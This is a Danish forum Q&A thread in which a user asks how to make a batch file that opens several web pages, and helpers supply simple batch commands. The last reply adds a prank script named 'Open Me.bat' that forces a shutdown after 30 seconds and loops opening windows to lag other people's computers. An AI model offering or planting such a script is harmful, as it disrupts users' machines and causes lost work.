/ Forside/ Teknologi / Udvikling / Andet udvikling / Spørgsmål
10  pallebhan.. 320
lave program .exe
Fra : Olle_hansen
Vist : 625 gange
50 point
Dato : 01-04-04 19:10

Hej, jeg skal høre om nogen ved hvordan jeg laver et program som, hvis man åbner det - åbner 2-3 html-vinduer op.?

Kommentar
Fra : BertelBrander

Dato : 01-04-04 19:58

Kan du ikke bare lave en bat-fil der åbner html siderne i browseren?

Kommentar
Fra : Olle_hansen

Dato : 01-04-04 20:03

Øhh, sikkert... Hvordan delen gør jeg så det?

Kommentar
Fra : BertelBrander

Dato : 01-04-04 20:11

Du starter notepad og skriver:

index.html
links.html

Hvor index.html og links.html er navnene på dine html-filer.
Så gemmer filen som whatever.bat.

Kommentar
Fra : Olle_hansen

Dato : 01-04-04 20:18

Hmm, det kan jeg ikke få til at virke...

Kan du give et exempel med www.kandu.dk?

Kommentar
Fra : BertelBrander

Dato : 01-04-04 20:21

Jeg troede at filerne lå lokalt på maskinen ...

Hvilken windows?

Kommentar
Fra : Olle_hansen

Dato : 01-04-04 20:26

Nåh, nej... Det skal være at man kan dobbeltklikke på en fil, og man går automatisk på nettet på de 2-3 pågældende sider.

Windows XP HOME

Kommentar
Fra : BertelBrander

Dato : 01-04-04 21:02

Du laver først en bat fil (f.ex. openpage.bat) med følgende indhold:

@echo off
setlocal
for /F "tokens=2 delims==" %%I in ('assoc .html') do for /F "tokens=2 delims== " %%A in ('ftype %%I') do set Command=%%A
%Command% %1

Så laver du en bat fil med følgende:
call openpage.bat http://www.kandu.dk/dk/spg/37211
call openpage.bat http://www.google.com

Kommentar
Fra : BertelBrander

Dato : 01-04-04 21:06

Det skulle have været:

@echo off

setlocal

DVS @echo off og setlocal skal stå på to forskellige linier

Kommentar
Fra : Olle_hansen

Dato : 01-04-04 21:43

Det virker slet ikke

Accepteret svar
Fra : BertelBrander

Modtaget 50 point
Dato : 01-04-04 23:06

Hvis det kun er til dig selv og du bruger internet explorer kan du blot lave en bat fil med:

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" www.kandu.dk
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" www.google.dk

Du har måske iexplore.exe til at ligge i en anden mappe.

Kommentar
Fra : arne.jakobsen

Dato : 01-08-04 15:32

Hej Olle. Som Bertel ganske rigtigt skriver, er den nemmeste måde at bruge .bat-filer og derfra foretage de af Bertel foreslåede kald. Nu skriver du ikke hvad du skal bruge det til. Men hvis det du har brug for er en nem måde at lave dine egne favoritkald(Links), vil jeg foreslå at du down-loader et program jeg har lavet ved navn MycoData. Det er fortrinsvist et Svampe-program, men har en Links-side som du selv kan redigere I. Op til 48 forskellige Links. Programmet er gratis og kan downloades fra www.svampe.com.

Kommentar
Fra : arne.jakobsen

Dato : 30-09-04 18:43

Hej Olle_hansen. Nu skal du huske at lukke spørgsmålet. Det gør du ved at trykke på "Accepter som svar", der står til højre over den kommentar du synes har været dig til størst hjælp. Du får så lejlighed til at sende en bemærkning til svareren. Spørgsmålet lukkes og de af dig udlovede point bliver udløst. Venlig hilsen Arne Jakobsen

Godkendelse af svar
Fra : Olle_hansen

Dato : 30-09-04 18:54

Tak for svaret BertelBrander.

Kommentar
Fra : runebabz

Dato : 23-12-07 12:14

det kan gøres meget lettere end som så.

Åben Notepad.
Skriv følgende

Start www.hej.dk
start www.google.dk

Gem film som hejsa.bat (det skriver du bare under gem som).

Læg den feks på skrivebordet, og afprøv.
Du kan lave den mere advanceret.
feks.

Echo off
shutdown -s -t 30
:a
start notepad
start cmd
start www.google.dk
goto a

Gem som "Open Me.bat"

når du åbner den vil echo off, gøre så der ikke åbnes 1 comando prot til at fortælle hva du laver.
Shutdown vil lukke computere (-s) efter 30 sek (-t 30)
:a er lavet som et punkt, der kan kan springes til ved hjælp af Goto a.
Start notepad, åbner simpelthen blot notepad.
Start CMD åbner comando promt.
Start www.google.dk åbner google.
Goto a, gentager alt hvad der er mellem a og goto a, lige indtil computeren slukkes.
dette giver masiv lag hos folk der ikk har ram nok.

HUSK AT GEM SOM BAT!

Dette kan senere hen med programmer omprogrameres til .exe filer.